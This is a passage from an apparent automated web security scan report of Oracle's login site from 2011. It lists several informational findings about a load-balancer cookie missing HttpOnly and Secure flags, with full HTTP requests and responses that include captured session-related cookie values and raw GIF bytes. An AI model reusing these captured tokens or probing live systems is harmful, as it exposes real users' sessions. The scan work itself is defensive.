Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC9J6uHK6EVADUS1EHWFB01t_ch
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........C`%.dINfj.j[.n
..L....5.8.(Gk(...PR...@...C..T....d].....N...y..x.!.;

13.95. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its name and value format identify it as an F5 BIG-IP load-balancer persistence cookie rather than an application session cookie. You should review the contents of the cookie to determine its function. Note that the Set-Cookie header in the response below also omits the Secure attribute, even though the response was served over HTTPS.

Request

GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpu6uHK6EVADUS1EHWFB01t_cD
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;

13.96. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-t-line.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its name and value format identify it as an F5 BIG-IP load-balancer persistence cookie rather than an application session cookie. You should review the contents of the cookie to determine its function. Note that the Set-Cookie header in the response below also omits the Secure attribute, even though the response was served over HTTPS.

Request

GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCUu6uHK6EVADUS1EHWFB01t_dK
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a.............!.......,...........D..Y.;

13.97. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/ip-o-logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its name and value format identify it as an F5 BIG-IP load-balancer persistence cookie rather than an application session cookie. You should review the contents of the cookie to determine its function. Note that the Set-Cookie header in the response below also omits the Secure attribute, even though the response was served over HTTPS.

Request

GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 1728
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCUU6uHK6EVADUS1EHWFB01t_dJ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89ar..........22................BB.......................................................................................................__..........................................................
...[SNIP]...

13.98. https://login.oracle.com/mysso/sso_loginui/loginStyling.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/loginStyling.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue; its name and value format identify it as an F5 BIG-IP load-balancer persistence cookie rather than an application session cookie. You should review the contents of the cookie to determine its function. Note that the Set-Cookie header in the response below also omits the Secure attribute, even though the response was served over HTTPS.

Request

GET /mysso/sso_loginui/loginStyling.css HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:14 GMT
Accept-Ranges: bytes
Content-Length: 14395
Content-Type: text/css
Last-Modified: Thu, 21 Jul 2011 20:04:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBQw6uHK6EVADUS1EHWFB01t_bN
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

/* Desktop Version */
body{font-family:Arial, Helvetica, sans-serif;}
.Mwrapper{ display:none;}
.wrapper{ display:block;margin:0px auto;width:974px; }
.logo-header{float:left; width:974px; height:50px
...[SNIP]...

13.99. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/moc_lib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/moc_lib.js HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
